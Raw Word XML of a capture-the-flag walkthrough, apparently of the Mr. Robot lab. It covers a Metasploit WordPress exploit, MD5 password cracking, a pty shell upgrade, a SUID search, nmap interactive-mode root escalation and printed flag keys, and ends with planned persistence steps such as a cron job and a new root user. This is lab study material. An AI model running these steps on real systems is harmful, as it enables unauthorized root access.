      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46536BC7" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A8CB6" w14:textId="5D94340C" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>ERROR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199DA8B2" w14:textId="2E8D0F6B" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7495491F" wp14:editId="4B0135D5">
            <wp:extent cx="5943600" cy="14878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5943600" cy="1487805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB28FB" w14:textId="0F8E395F" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error states that Metasploit cannot confirm if there is word press running on target machine. We know this to be false. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4C64E" w14:textId="7B37D436" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>advanced options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D527CF" w14:textId="3A8DFEA8" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00B65B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">we look in advanced options to identify </w:t>
      </w:r>
      <w:r w:rsidR="00B65B43">
        <w:t xml:space="preserve">an option to not check if word press is running and just to assume. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746F55C9" w14:textId="71BEAE9E" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3DDBCF" wp14:editId="3F66D269">
            <wp:extent cx="5943600" cy="3495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0AC89447" w14:textId="66A2E740" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E6BAD" w14:textId="42F6DF31" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DD2A4D" wp14:editId="0BE62BAC">
            <wp:extent cx="5943600" cy="33521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4BED17AC" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1FDF2" w14:textId="6E015651" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC2F60" w14:textId="77777777" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:tab/>
        <w:t>gain terminal access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7224B5" w14:textId="77777777" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="445945FB" w14:textId="78F6FB62" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="00D41059"/>
    <w:p w14:paraId="04680C4D" w14:textId="0736D6F3" w:rsidR="00D41059" w:rsidRDefault="009B7B11" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE0E378" wp14:editId="58A90545">
            <wp:extent cx="5943600" cy="23590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2359025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F17BA92" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C5D48C1" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD0C87" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">cd /home </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C96468C" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D48D8" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cd /robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A806B19" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9975C0" w14:textId="18E54DEE" w:rsidR="00D41059" w:rsidRDefault="009B7B11" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FEB5178" wp14:editId="43180280">
            <wp:extent cx="1272485" cy="43349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1287561" cy="4386291"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09470E29" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">SECOND FLAG FOUND [flag]/ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>password ] but it's md5 encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6F258" w14:textId="0B24BD06" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="009B7B11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cracked hash website (crack station) has it cracked and listed as [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcdefghijklmnopqestuvwxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBDD54" w14:textId="76F3D0B6" w:rsidR="00D41059" w:rsidRDefault="00183B62" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52EEF618" wp14:editId="5519FD6E">
            <wp:extent cx="2370667" cy="459766"/>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2449271" cy="475010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029ABC06" wp14:editId="542B20A8">
            <wp:extent cx="5196591" cy="2777067"/>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28888" cy="2794326"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26C4AB" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>switch to robot user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953B659" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> robot, you get an error stating you need to be in a terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B87798F" w14:textId="154B7D02" w:rsidR="00D41059" w:rsidRDefault="00183B62" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C076CA7" wp14:editId="12C491AD">
            <wp:extent cx="3314700" cy="406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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3314700" cy="406400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F14ED" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Lateral Movement, New Shell, New User Owned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2A7DA" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="654E5BA4" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E8FC1" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>spawns a terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D852D" w14:textId="1A1552F2" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> robot with the password [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcdefghijklmnopqestuvwxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BD120" w14:textId="13C5156F" w:rsidR="00183B62" w:rsidRDefault="00183B62" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD3ED23" wp14:editId="64557E19">
            <wp:extent cx="3911600" cy="990154"/>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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3984844" cy="1008695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="576AF3AD" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cd /robots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D131601" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203FFC42" w14:textId="3ED382E3" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cat key-2-of-3.txt = 822c73956184f694993bede3eb39f959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53511754" w14:textId="6A3BD76C" w:rsidR="00183B62" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C43250" wp14:editId="21E31075">
            <wp:extent cx="2404533" cy="1446269"/>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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2424170" cy="1458080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA8E0B" w14:textId="5A70AB5C" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:r w:rsidRPr="008976A8">
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6A162" w14:textId="4B8506FD" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="008976A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">finds files being ran by the owner with SUID permissions 4000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD25ED" w14:textId="4FB8050D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B1B1D" w14:textId="38D382F4" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25538A7B" wp14:editId="2CE50D65">
            <wp:extent cx="3880615" cy="719667"/>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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3992677" cy="740449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6064C68B" w14:textId="4969F725" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">research time -- it's vulnerable! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1521AD59" w14:textId="4E3A59F5" w:rsidR="00D41059" w:rsidRDefault="008976A8" w:rsidP="008976A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Google search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and version number &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008976A8">
        <w:t>https://vk9-sec.com/nmap-privilege-escalation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803E38F" w14:textId="4714FCDF" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Root </w:t>
      </w:r>
      <w:r w:rsidR="008976A8">
        <w:t>escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DAF94" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="5185974F" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A83AD" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A2C62" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F358FB4" w14:textId="2F99F26F" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FF64B6A" w14:textId="44D15F4E" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F41FF04" w14:textId="0001F0E0" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65826F27" wp14:editId="096EA938">
            <wp:extent cx="3945467" cy="199844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6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3974571" cy="2013187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6E001" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725C6AB1" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75EA88" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>cat key-3-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB34257" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>04787ddef27c3dee1ee161b21670b4e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404E2C4" w14:textId="2B74830A" w:rsidR="00D41059" w:rsidRDefault="008976A8" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD3E9BB" wp14:editId="0296C4AE">
            <wp:extent cx="2887133" cy="1543304"/>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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918709" cy="1560183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A1110" w14:textId="77777777" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059"/>
    <w:p w14:paraId="43E9735D" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="45391331" w14:textId="77777777" w:rsidR="000A4E5B" w:rsidRDefault="000A4E5B" w:rsidP="00D41059"/>
    <w:p w14:paraId="17BB1E3B" w14:textId="77777777" w:rsidR="000A4E5B" w:rsidRDefault="000A4E5B" w:rsidP="00D41059"/>
    <w:p w14:paraId="1E9F641F" w14:textId="77777777" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059"/>
    <w:p w14:paraId="58099A20" w14:textId="77777777" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059"/>
    <w:p w14:paraId="2A4A4D07" w14:textId="77777777" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059"/>
    <w:p w14:paraId="7D09377C" w14:textId="77777777" w:rsidR="008976A8" w:rsidRDefault="008976A8" w:rsidP="00D41059"/>
    <w:p w14:paraId="6DFB8DD9" w14:textId="7F79C1B5" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>What I want to try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DC094" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="0151ECA0" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF5718" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">all users into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED0A8F" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="66BB0942" w14:textId="25D2D809" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Create New User with Root </w:t>
      </w:r>
      <w:r w:rsidR="008976A8">
        <w:t>Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F05D0" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Shutdown/Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486ED86D" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Login with new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F719B99" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Check group id/ permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B19CB" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Create "hello world script"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC95916" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Run "hello world script"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B80C0" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="18969CE9" w14:textId="553724D5" w:rsidR="000A4483" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>End Scene</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000A4483" w:rsidSect="00B561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318C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEA496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867CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6A63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E17283"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
